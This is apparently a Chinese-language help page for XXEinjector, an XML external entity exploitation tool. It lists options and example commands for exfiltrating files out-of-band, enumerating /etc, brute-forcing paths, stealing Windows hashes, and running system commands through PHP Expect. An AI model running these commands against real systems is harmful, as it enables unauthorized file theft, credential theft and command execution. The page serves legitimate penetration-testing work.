XXEinjector-20200827

选项:

  --host          必填 - 用于反向连接的IP地址 (--host=192.168.0.2)
  --file          必填 - 包含有效HTTP请求和XML的文件 你也可以使用"XXEINJECT"标记应该注入DTD的点 (--file=/tmp/req.txt)
  --path          必填 如果枚举目录 - 枚举路径 (--path=/etc)
  --brute         必填 如果暴力破解文件 - 带有暴力破解路径的文件 (--brute=/tmp/brute.txt)
  --logger        仅记录结果 不发送请求 HTTP记录器查找带有"p"参数的结果

  --rhost         远程主机的IP地址或域名 仅针对没有Host Header的请求使用此参数 (--rhost=192.168.0.3)
  --rport         远程主机的TCP端口 仅针对没有Host Header和非默认值的请求使用此参数 (--rport=8080)

  --oob           带外利用方法 FTP是默认设置 FTP可以在任何应用程序中使用 通过Java < 1.7应用程序中的目录列表 HTTP可以用于暴力破解和枚举 Gopher只能在Java < 1.7应用程序中使用 (--oob=http/ftp/gopher)
  --direct        使用直接利用而不是带外 应为此参数指定唯一标记作为值 此标记指定XXE的结果在何处开始和结束 指定"--direct-xml"以查看请求文件中的XML外观 如果要在利用期间使用本地DTD 则指定"--localdtd-xml" 如果在输出数据之前或之后的响应中出现特殊字符时开始和结束标记有任何问题 请使用"Burp Proxy"的"match and replace"选项来替换 (--direct=UNIQUEMARKSTART,UNIQUEMARKEND)
  --cdata         使用CDATA改进直接利用 可以直接检索数据 但是OOB用于构造CDATA有效负载 指定"--cdata-xml"以查看请求在此技术中的外观
  --2ndfile       包含用于二阶利用的有效HTTP请求的文件 (--2ndfile=/tmp/2ndreq.txt)
  --phpfilter     发送前使用PHP过滤器对目标文件进行BASE64编码
  --netdoc        使用NetDoc协议代替文件 (Java)
  --enumports     枚举未过滤的端口以进行反向连接 指定值"all"以枚举所有TCP端口 (--enumports=21,22,80,443,445)

  --hashes        窃取运行应用程序的用户的Windows哈希
  --expect        使用PHP Expect扩展来执行任意系统命令 最适合与HTTP和PHP过滤器一起使用 (--expect=ls)
  --upload        使用Java Jar模式将指定的文件上传到临时文件中 (--upload=/tmp/upload.txt)
  --xslt          测试XSLT注入

  --ssl           使用SSL
  --proxy         使用代理 (--proxy=127.0.0.1:8080)
  --httpport      设置自定义HTTP端口 (--httpport=80)
  --ftpport       设置自定义FTP端口 (--ftpport=21)
  --gopherport    设置自定义Gopher端口 (--gopherport=70)
  --jarport       设置用于Jar上传文件的自定义端口 (--jarport=1337)
  --xsltport      设置用于XSLT注入测试的自定义端口 (--xsltport=1337)

  --test          此模式显示带有注入的有效负载的请求并退出 用于验证请求的正确性而不将其发送到服务器
  --urlencode     URL编码注入的DTD 这是URI的默认设置
  --nodtd         如果你想自己将DTD放入请求当中 指定"--oob-xml"以显示DTD的外观
  --output        暴力破解和记录器模式的输出文件 默认情况下它记录到当前目录中的brute.log文件 (--output=/tmp/out.txt)
  --timeout       接收文件/目录内容的超时 (--timeout=20)
  --contimeout    关闭与服务器的连接超时 这用于防止DoS条件 (--contimeout=20)
  --fast          跳过询问要枚举的内容 容易出现误报
  --verbose       显示详细消息

用法示例:

  在HTTPS应用程序中枚举 /etc 目录:
    ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl

  使用Gopher的OOB方法枚举 /etc 目录:
    ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher

  二阶利用:
    ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt

  使用HTTP带外方法和NetDoc协议对文件进行暴力破解:
    ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc

  使用直接利用进行枚举:
    ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARKSTART,UNIQUEMARKEND

  枚举未过滤的端口:
    ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all

  窃取Windows哈希:
    ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes

  使用Java Jar上传文件:
    ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf

  使用PHP Expect执行系统命令:
    ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls

  测试XSLT注入:
    ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt

  仅记录请求:
    ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt